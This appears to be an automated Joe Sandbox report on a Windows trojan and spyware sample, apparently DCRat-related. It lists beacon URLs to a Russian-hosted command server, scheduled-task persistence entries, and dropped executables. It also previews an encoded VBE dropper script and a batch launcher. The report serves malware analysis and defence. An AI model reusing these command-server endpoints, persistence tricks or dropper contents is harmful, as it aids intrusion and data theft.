http://ce58027.tw1.ru/4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W	true	Avira URL Cloud: safe	unknown
http://ce58027.tw1.ru/@=MDNwQWMlZGN	true	Avira URL Cloud: safe	unknown
http://ce58027.tw1.ru/4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN	true	Avira URL Cloud: safe	unknown
http://ce58027.tw1.ru/4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
https://duckduckgo.com/chrome_newtab	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
https://duckduckgo.com/ac/?q=	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
http://ce58027.tw1.ru/4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMl	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
http://ce58027.tw1.ru/	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
https://www.ecosia.org/newtab/	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	providerwebmonitor.exe, 00000004.00000002.1711103397.000000000266A000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ce58027.tw1.ru	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	false		high
http://ce58027.tw1.ru/4fe1d043.php?sfxSMm=rxb3wPgb0HPV&2e6ea3aaeac867bc064a534e31e365d4=6f9cfd298d97	aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.114.245.123	ce58027.tw1.ru	Russian Federation		9123	TIMEWEB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581785
Start date and time:	2024-12-29 00:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hK8z1AmKO1.exe renamed because original name is a hash value
Original Sample Name:	69479795019aa359d016e695415f1736.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@36/33@1/1
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, UserOOBEBroker.exe, upfc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aVgRtcWKvuiHvUKTYwWvDjIq.exe, PID 6656 because it is empty
Execution Graph export aborted for target providerwebmonitor.exe, PID 7112 because it is empty
Execution Graph export aborted for target sihost.exe, PID 6852 because it is empty
Execution Graph export aborted for target sihost.exe, PID 7024 because it is empty
Execution Graph export aborted for target sihost.exe, PID 7364 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: hK8z1AmKO1.exe

Simulations

Behavior and APIs

Time	Type	Description
18:07:04	API Interceptor	2665126x Sleep call for process: aVgRtcWKvuiHvUKTYwWvDjIq.exe modified
23:07:02	Task Scheduler	Run new task: aVgRtcWKvuiHvUKTYwWvDjIq path: "C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe"
23:07:02	Task Scheduler	Run new task: aVgRtcWKvuiHvUKTYwWvDjIqa path: "C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe"
23:07:02	Task Scheduler	Run new task: sihost path: "C:\Recovery\sihost.exe"
23:07:02	Task Scheduler	Run new task: sihosts path: "C:\Recovery\sihost.exe"
23:07:02	Task Scheduler	Run new task: upfc path: "C:\PortsavesPerfdhcpsvc\upfc.exe"
23:07:02	Task Scheduler	Run new task: upfcu path: "C:\PortsavesPerfdhcpsvc\upfc.exe"
23:07:02	Task Scheduler	Run new task: UserOOBEBroker path: "C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe"
23:07:02	Task Scheduler	Run new task: UserOOBEBrokerU path: "C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.114.245.123	DCRatBuild.exe	Get hash	malicious	DCRat	Browse
185.114.245.123	CPYEzG7VGh.exe	Get hash	malicious	DCRat	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TIMEWEB-ASRU	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	91.210.168.189
	bot.sh4.elf	Get hash	malicious	Mirai	Browse	91.210.168.190
	LaRHzSijsq.exe	Get hash	malicious	DCRat	Browse	92.53.106.114
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	176.57.212.213
	2.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Order Ref SO14074.pdf.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	rPO49120.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	rPO49120.scr.exe	Get hash	malicious	Unknown	Browse	5.23.51.54
	DCRatBuild.exe	Get hash	malicious	DCRat	Browse	185.114.245.123
	guia_luqf.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\PortsavesPerfdhcpsvc\7ccfebd9e92364

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with very long lines (681), with no line terminators
Category:	dropped
Size (bytes):	681
Entropy (8bit):	5.858367265472231
Encrypted:	false
SSDEEP:	12:uYckV7Z6q0rIxZgW6L9ulbty/mI7reRXYh+lKFt7iT1q3IWsYP2Dn+ynQWsRJFYm:8yZ6zI3WLQ7AZ3eRXJKnHlsD+ykF/
MD5:	C52DACDD49B627FDCCF29E6249B4F966
SHA1:	C3D90E6149AFCE1791A624381C6A94A52DF7D05C
SHA-256:	3B8844FF8F31503A861833D851924FA80115F2FDF5ADA45A952B07E5F21BCD14
SHA-512:	036130CF663829A812FE7A4A3FE56C5178642F5681E1FCEFA4689E11E6FE03A68CEF9353722BEAC8F31F14AD6DD6874B9EA0F4CD0EB25FD8D9E9FC88221E1375
Malicious:	false
Preview:	AVmwylxeCmLls5Dc16CQH3PydQ5IVpT4PElcGIHGAbnQYE818jDNZniHGySipoJXTRWoTlVtz6QqQ9ZZREKwmGflfeWSzjaVSQ6HsUhXNTXcX21GZ3QkeXuNwuIzPD4Pf4YACRq7gwiTsCOnmP35T004fsV8LsHJYI7ce1EHNSErybftffM9K86pEdeU6swxpY4jEvJvLwsAvIGENlcpgI9aLSYBWuKegQCZg5ptWayYQ535WZGVQGRgYeYwXHYblOefGqhR6sTFTlJPYco7nzOZ9fACh2WOCXwCaYzq1zYiwLNxUIX5dbywAFfkpfuDWFD6yHyAm8FyapmxSNsYfaukjACV2PAWEVMrHQ8MTWSfWAWUcsRcxWi5UcXyFcIX7stEd5pCOfEIHPOjor3K7ijsxQXp2KG0O5inQR0gCPNRRZxFOyKYj7ZZJBRMhAJDZO3LqkSW0WIsURaXcRaEAsRRgJeO9o8BGK2DfmYnfxhMzqE1k3tQkEDq6mphGEWMYGlKZX103wiNLFbzEmnG4saBGLG371hbaUxsE4cNB3Xxf0f1KzdeaQSpqkDNR83CPHw0RtuJJaEAVmfQpPsHXDAJBICe1P5D9UiYDpjbETUALRTDEwhCPvoLGmyIrQS4eBBAEHMApRDEsA8uy8aEr3xOqXSb0auyAZfKQT97j

C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\PortsavesPerfdhcpsvc\ea1d8f6d871115

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	123
Entropy (8bit):	5.447703611840787
Encrypted:	false
SSDEEP:	3:LQV+zHCZSXgB5ihOwhe6ZrsVSbSBjMdWpdG8d:trCZSw7ahe6ZgVekjKuE+
MD5:	F41B3D9C8B54C4C6745BF1CBA88A483A
SHA1:	819BD603F89E1FE2AF53ABE0832479EEB549D09E
SHA-256:	FF62A95E73584D3B36CBC66768D18F42CA1A26476F7909E50AB62EBB4F69A4B9
SHA-512:	76FAA0E813CA766EC260F1FD9D6CC5E049BCE4D7676DB2B30D5B26065B4DAE5987632CCE3CF9E9BDD9431E030D47D0915135A4C0576A545C8022426C2E064822
Malicious:	false
Preview:	qw5OIHunGf3Cp1VblYzNOjOTGFCKVm7wjckjj3WDb5kF16uI7okvzz2GimHDFkRehGdMQv1rBvwT8IbKU4NrBL7tkdB7wT81nFhuci1Lw2uDDjIZK7sLWkcWJum

C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe

Download File

Process:	C:\Users\user\Desktop\hK8z1AmKO1.exe
File Type:	data
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.881730802343666
Encrypted:	false
SSDEEP:	6:GXkgwqK+NkLzWbHY08nZNDd3RL1wQJRWivsuTSKI2+WJN61:GXkBMCzWLY04d3XBJTvpSLy8
MD5:	DBF398DFA1726DF982D85BC02939320C
SHA1:	B0C5E0466E495E0A10D26A7DA84679C9DFBA62B3
SHA-256:	A4CF2C149C436D3C599C803217A4462A32AF2368A9802E260D67B1DDF7895ECC
SHA-512:	FD8DA85BF874DFBAB9A65F6E7ED75BFEDA0A3D30E699E2E1D802AF08BFAD9EADC0FE3B2ED8D5DFDAD5A9CD64C4F336EBA675EEA50610C47F953553AC99DCDAF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJnGMYkl\./hnD6N4ma/-^JW?VTfDhCl0%2UNhk.4}.$C{\|(XR(lOEBP!S~6ls/.Rz8AAA==^#~@.

C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat

Download File

Process:	C:\Users\user\Desktop\hK8z1AmKO1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.321854365656768
Encrypted:	false
SSDEEP:	3:I5uT+NUCuVXKTdIRML4i:IX8oRI2ki
MD5:	4387DC0B0EBB7BF3A86EDB1DD021F888
SHA1:	06A237BC6AD1BE7F101103315F871331B8693716
SHA-256:	CB24866F71B8BE1F5C55E631590497CEC3A9E864252382CA6C3CF6FCDC8A9326
SHA-512:	F310BC55F39CA8AF091EF481F32F94448E907016FB80072481FB534BBCB1D2339F8738B5480D6630AEF85507F04F1ABAFE59D2E6DEA125E355E81FA3A60943C0
Malicious:	false
Preview:	"C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe"

C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

Download File

Process:	C:\Users\user\Desktop\hK8z1AmKO1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\PortsavesPerfdhcpsvc\upfc.exe

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
